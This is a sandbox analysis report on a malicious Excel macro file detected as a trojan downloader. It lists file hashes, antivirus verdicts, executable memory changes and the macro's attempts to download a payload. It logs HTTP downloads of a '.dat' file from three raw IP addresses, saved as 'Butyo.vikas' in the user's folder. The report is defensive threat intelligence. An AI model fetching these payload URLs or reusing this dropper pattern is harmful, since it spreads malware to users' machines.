Summary | ZeroBOX

5bef7b39fe02eabea2c0261275876217eb8cc2f1c861c1a7ffeba6c1b0769373.xlsm

VBA_macro
Category FILE
Machine s1_win7_x6402
Started April 30, 2021, 9:21 a.m.
Completed April 30, 2021, 9:23 a.m.
Size 217.6KB
Type Microsoft Excel 2007+
MD5 6f203feba292f1322dae52e76dbf4ce4
SHA256 5bef7b39fe02eabea2c0261275876217eb8cc2f1c861c1a7ffeba6c1b0769373
CRC32 909247A0
ssdeep 3072:owfbewQHBYJ6tID2WMgHYF0WDRCSm6eh7XtANARwb/Biqhqyn5:9luYQwDPM0Mhm559AYqD5
Yara
  • Contains_VBA_macro_code - Detect a MS Office document with embedded VBA macro code [binaries]

DNS (Name / Response / Post-Analysis Lookup)
No hosts contacted.

IP Address Status
172.217.25.14 Active
185.82.218.30 Active
190.14.37.252 Active
91.211.91.71 Active

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

suspicious_features: Connection to IP address
suspicious_request: GET http://190.14.37.252/44313,6048108796.dat

suspicious_features: Connection to IP address
suspicious_request: GET http://91.211.91.71/44313,6048108796.dat

suspicious_features: Connection to IP address
suspicious_request: GET http://185.82.218.30/44313,6048108796.dat

request: GET http://190.14.37.252/44313,6048108796.dat
request: GET http://91.211.91.71/44313,6048108796.dat
request: GET http://185.82.218.30/44313,6048108796.dat
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 3972
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x70af1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3972
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x70b4f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3972
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x70b4f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3972
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73711000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3972
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05641000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3972
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x66c51000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3972
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x66c11000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3972
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73c91000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3972
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x743c1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3972
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05f80000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3972
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05f80000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3972
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05f90000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3972
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05fa0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3972
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73cd1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3972
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73cb1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3972
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x743b1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3972
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73321000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3972
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x71f61000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3972
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x71f71000
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\~$5bef7b39fe02eabea2c0261275876217eb8cc2f1c861c1a7ffeba6c1b0769373.xlsm
Time & API Arguments Status Return Repeated

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x00000348
filepath: C:\Users\test22\AppData\Local\Temp\~$5bef7b39fe02eabea2c0261275876217eb8cc2f1c861c1a7ffeba6c1b0769373.xlsm
desired_access: 0xc0110080 (FILE_READ_ATTRIBUTES|DELETE|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$5bef7b39fe02eabea2c0261275876217eb8cc2f1c861c1a7ffeba6c1b0769373.xlsm
create_options: 4198496 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_DELETE_ON_CLOSE)
status_info: 2 (FILE_CREATED)
share_access: 1 (FILE_SHARE_READ)
1 0 0
K7AntiVirus: Trojan ( 0057940f1 )
K7GW: Trojan ( 0057940f1 )
Cyren: PP97M/Downldr.RK.gen!Eldorado
Zoner: Probably Heur.W97ShellM
host 172.217.25.14
host 185.82.218.30
host 190.14.37.252
host 91.211.91.71
Time & API Arguments Status Return Repeated

URLDownloadToFileW

url: http://190.14.37.252/44313,6048108796.dat
stack_pivoted: 0
filepath_r: ..\Butyo.vikas
filepath: C:\Users\test22\Butyo.vikas
2148270088 0

URLDownloadToFileW

url: http://91.211.91.71/44313,6048108796.dat
stack_pivoted: 0
filepath_r: ..\Butyo.vikas
filepath: C:\Users\test22\Butyo.vikas
2148270088 0

URLDownloadToFileW

url: http://185.82.218.30/44313,6048108796.dat
stack_pivoted: 0
filepath_r: ..\Butyo.vikas
filepath: C:\Users\test22\Butyo.vikas
2148270088 0